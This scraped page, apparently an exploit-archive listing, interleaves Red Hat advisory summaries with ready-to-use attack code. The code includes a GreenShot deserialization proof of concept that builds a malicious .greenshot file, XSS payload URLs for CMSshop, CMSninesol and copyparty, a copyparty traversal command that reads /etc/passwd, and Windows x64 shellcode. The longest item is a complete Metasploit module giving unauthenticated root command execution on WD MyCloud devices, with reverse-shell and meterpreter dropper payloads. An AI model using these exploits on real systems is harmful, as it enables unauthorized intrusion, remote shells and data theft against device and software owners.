Red Hat Security Advisory 2023-4325-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-4325-01

GreenShot version 1.2.10 suffers from an insecure deserialization arbitrary code execution vulnerability.

    # Exploit Title: GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution# Date: 26/07/2023# Exploit Author: p4r4bellum# Vendor Homepage: https://getgreenshot.org# Software Link: https://getgreenshot.org/downloads/# Version: 1.2.6.10# Tested on: windows 10.0.19045 N/A build 19045# CVE : CVE-2023-34634## GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file# will lead to arbitrary code execution## Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw#load the payload$payload = Get-Content .\payload.bin -Encoding Byte# retrieve the length of the payload$length = $payload.Length# load the required assembly to craft a PNG fileAdd-Type -AssemblyName System.Drawing# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell$filename = "$home\poc.greenshot"$bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file$payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding  Byte -NoNewline# append the signature"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii# launch greenshot. Calc.exe should be executedInvoke-Item  $filename

GreenShot 1.2.10 Arbitrary Code Execution

Red Hat Security Advisory 2023-4289-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift API for Data Protection (OADP) 1.0.11 security and bug fix update  
Advisory ID:       RHSA-2023:4289-01  
Product:           OpenShift API for Data Protection  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4289  
Issue date:        2023-07-27  
CVE Names:         CVE-2020-24736 CVE-2022-48281 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-24540 CVE-2023-26604   
=====================================================================

1. Summary:

OpenShift API for Data Protection (OADP) 1.0.11 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore  
application resources, persistent volume data, and internal container  
images to external backup storage. OADP enables both file system-based and  
snapshot-based backups for persistent volumes.

Security Fix(es) from Bugzilla:

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

5. JIRA issues fixed (https://issues.redhat.com/):

OADP-1504 - oadp-1.0: Restoring pod using image from openshift build randomly ImagePullBackoff

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-48281  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkxCC+AAoJENzjgjWX9erEL74P+wZeJaHj4sqBTgCle1QC2ylN  
mLpWyUC5heY8E6h21jqr1cgh4Opf3M0NJdIn3R3OkyeXMuXNlCdyI6RGZg7DHE0f  
E0lc8WAOqpZvHiR9J2YOb1aOWwTUInvXYX5viR5oXnw+2oyTfuVgfYbW12MKzryH  
IxvCEnRBh1Frp5CPa7M+bctBJjt72rhzvu8xRRdeyjDmq/K/MCLYDTB2+BhyaZEr  
xsmwf6qcTuSbza7nXdUaqfs3riTYtXDZMp42inyuCr4xwBMoTzVyNciacw586stD  
BKJ3QYdxB2tu5v7+b8QuNhWQdCURwfFegdch/tlw0V5QqBHnGHe+lRt17K7CIm+h  
53rrM5Oc57nR5SxY4nDsX1OOtc/aHpEMZsqcgv7GF4YWjt//qcL87zxRNKoL+byJ  
jqFrxO3eU9DBd1jDLtHaoNlrCNb/eXd00wlLxPTDYEr8tc1R2Skep3iNaZ9fDNEX  
chIvtTvNKcfXyHL3GhStzfCumQlVuA8vkZAzSCyZ3KxrMZcjpyp8dE0nCiGdHRgX  
JlNZnxWQaadZj8ZyxXo+50/XDqAtQc4kNFyoSB2mKeBx7bwcmb+jGqtrwonpx3S+  
Jklo8UxGYNCkJoEez9S+970pc6jTvr1xZo6Mqpr3lMFZ8QYkhHLExvyWy9P8BzCw  
aZcVairD+7OHWeKtNhzx  
=ADOo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4289-01

CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

Copyparty version 1.8.2 suffers from a directory traversal vulnerability.

    # Exploit Title: copyparty 1.8.2 - Directory Traversal# Date: 14/07/2023# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2# Version: <=1.8.2# Tested on: Debian Linux# CVE : CVE-2023-37474#DescriptionCopyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.#POCcurl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

Copyparty 1.8.2 Directory Traversal

Copyparty version 1.8.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)# Date: 23/07/2023# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6# Version: <=1.8.6# Tested on: Debian Linux# CVE : CVE-2023-38501#DescriptionCopyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.#POChttps://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

Copyparty 1.8.6 Cross Site Scripting

169 bytes small Windows/x64 PIC NULL-free calc.exec shellcode.

    import ctypes, structfrom keystone import *# Shellcode Author: Senzee# Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)# Date: 07/26/2023# Platform: Windows x64# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763# Shellcode size: 169 bytes# Shellcode Desciption: Windows x64 shellcode that dynamically resolves the base address of kernel32.dll via PEB and ExportTable method.# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.CODE = ("find_kernel32:"" xor rdx, rdx;"" mov rax, gs:[rdx+0x60];"    # RAX stores  the value of ProcessEnvironmentBlock member in TEB, which is the PEB address" mov rsi,[rax+0x18];"    # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure" mov rsi,[rsi + 0x20];"    # RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure" mov r9, [rsi];"    # Current module is python.exe" mov r9, [r9];"    # Current module is ntdll.dll" mov r9, [r9+0x20];"    # Current module is kernel32.dll" jmp call_winexec;""parse_module:" # Parsing DLL file in memory" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores  the base address of the module, get the NT header offset" xor r15, r15;"" mov r15b, 0x88;"    # Offset to Export Directory   " add r15, r9;"" add r15, rcx;"" mov r15d, dword ptr [r15];"    # Get the RVA of the export directory" add r15, r9;"    # R14 stores  the VMA of the export directory" mov ecx, dword ptr [r15 + 0x18];"    # ECX stores  the number of function names as an index value" mov r14d, dword ptr [r15 + 0x20];"    # Get the RVA of ENPT" add r14, r9;"    # R14 stores  the VMA of ENPT"search_function:"    # Search for a given function" jrcxz not_found;"    # If RCX is 0, the given function is not found" dec ecx;"    # Decrease index by 1" xor rsi, rsi;"" mov esi, [r14 + rcx*4];"    # RVA of function name string" add rsi, r9;"    # RSI points to function name string"function_hashing:"    # Hash function name function" xor rax, rax;"" xor rdx, rdx;"" cld;"    # Clear DF flag"iteration:"     # Iterate over each byte" lodsb;"     # Copy the next byte of RSI to Al" test al, al;"     # If reaching the end of the string" jz compare_hash;"     # Compare hash" ror edx, 0x0d;"     # Part of hash algorithm" add edx, eax;"     # Part of hash algorithm" jmp iteration;"     # Next byte"compare_hash:"     # Compare hash" cmp edx, r8d;"" jnz search_function;"     # If not equal, search the previous function (index decreases)" mov r10d, [r15 + 0x24];"     # Ordinal table RVA" add r10, r9;"     # Ordinal table VMA" movzx ecx, word ptr [r10 + 2*rcx];"     # Ordinal value -1" mov r11d, [r15 + 0x1c];"    # RVA of EAT" add r11, r9;"    # VMA of EAT" mov eax, [r11 + 4*rcx];"    # RAX stores  RVA of the function" add rax, r9;"    # RAX stores  VMA of the function" ret;""not_found:"" ret;""call_winexec:""    mov r8d, 0xe8afe98;"     # WinExec Hash"    call parse_module;"     # Search and obtain address of WinExec"    xor rcx, rcx;""    push rcx;"    # \0"    mov rcx, 0x6578652e636c6163;"    # exe.clac "    push rcx;""    lea rcx, [rsp];"    # Address of the string as the 1st argument lpCmdLine"    xor rdx,rdx;""    inc rdx;"    # uCmdShow=1 as the 2nd argument "    sub rsp, 0x28;""    call rax;"     # WinExec)# Payload size: 169 bytes# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"# buf += b"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"# buf += b"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"ks = Ks(KS_ARCH_X86, KS_MODE_64)encoding, count = ks.asm(CODE)print("%d instructions..." % count)sh = b""for e in encoding:    sh += struct.pack("B", e)shellcode = bytearray(sh)sc = ""print("Payload size: "+str(len(encoding))+" bytes")counter = 0sc = "buf =  b\""for dec in encoding:    if counter % 20 == 0 and counter != 0:        sc += "\"\nbuf += b\""    sc += "\\x{0:02x}".format(int(dec))    counter += 1if count % 20 > 0:  sc += "\""  print(sc)print("Payload size: "+str(len(encoding))+" bytes")

Windows/x64 PIC NULL-Free Calc.exec Shellcode

Red Hat Security Advisory 2023-4328-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-4328-01

CMSninesol version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSninesol v1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ninesol.com                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSninesol 1.0 Cross Site Scripting

This Metasploit module exploits authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user. The module first performs a check to see if the target is WD MyCloud. If so, it attempts to trigger an authentication bypass (CVE-2018-17153) via a crafted GET request to /cgi-bin/network_mgr.cgi. If the server responds as expected, the module assesses the vulnerability status by attempting to exploit a commend injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command. This is done via a crafted POST request to /web/google_analytics.php. If the server is vulnerable, the same command injection vector is leveraged to execute the payload. This module has been successfully tested against Western Digital MyCloud version 2.30.183.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Western Digital MyCloud unauthenticated command injection',        'Description' => %q{          This module exploits authentication bypass (CVE-2018-17153) and          command injection (CVE-2016-10108) vulnerabilities in Western          Digital MyCloud before 2.30.196 in order to achieve          unauthenticated remote code execution as the root user.          The module first performs a check to see if the target is          WD MyCloud. If so, it attempts to trigger an authentication          bypass (CVE-2018-17153) via a crafted GET request to          /cgi-bin/network_mgr.cgi. If the server responds as expected,          the module assesses the vulnerability status by attempting to          exploit a commend injection vulnerability (CVE-2016-10108) in          order to print a random string via the echo command. This is          done via a crafted POST request to /web/google_analytics.php.          If the server is vulnerable, the same command injection vector          is leveraged to execute the payload.          This module has been successfully tested against Western Digital          MyCloud version 2.30.183.          Note: based on the available disclosures, it seems that the          command injection vector (CVE-2016-10108) might be exploitable          without the authentication bypass (CVE-2018-17153) on versions          before 2.21.126. The obtained results on 2.30.183 imply that          the patch for CVE-2016-10108 did not actually remove the command          injection vector, but only prevented unauthenticated access to it.        },        'License' => MSF_LICENSE,        'Author' => [          'Erik Wynter', # @wyntererik - Metasploit          'Steven Campbell', # CVE-2016-10108 disclosure and PoC          'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC        ],        'References' => [          ['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.          ['CVE', '2018-17153'], # authentication bypass          ['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC          ['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Platform' => %w[linux unix],        'Arch' => [ ARCH_ARMLE, ARCH_CMD ],        'Targets' => [          [            'Unix In-Memory',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },              'Type' => :unix_memory            }          ],          [            'Linux Dropper', {              'Arch' => [ARCH_ARMLE],              'Platform' => 'linux',              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',                'CMDSTAGER::FLAVOR' => :curl              },              'Type' => :linux_dropper            }          ]        ],        'CmdStagerFlavor' => ['curl', 'wget'],        'Privileged' => true,        'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),    ])  end  def check    # sanity check to see if the target is likely WD MyCloud    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('Connection failed.') unless res    return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')    print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")    # try the authentication bypass (CVE-2018-17153)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),      'vars_get' => {        'cmd' => 'cgi_get_ipv6',        'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details      }    })    return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res    return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404    # send a command to print a random string via echo. if the target is vulnerable, both the command  and the command output will be part of the response body    echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"    print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")    res = execute_command(echo_cmd, { 'wait_for_response' => true })    return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res    return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')    CheckCode::Safe('The target failed to execute the echo command.')  end  def execute_command(cmd, opts = {})    request_hash = {      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),      'cookie' => 'username=admin',      'vars_post' => {        'cmd' => 'set',        'opt' => 'cloud-device-num',        'arg' => "0|echo `#{cmd}` #"      }    }    return send_request_cgi(request_hash) if opts['wait_for_response']    # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response    send_request_cgi(request_hash, 0)  end  def exploit    if target.arch.first == ARCH_CMD      print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  endend

Source

Packet Storm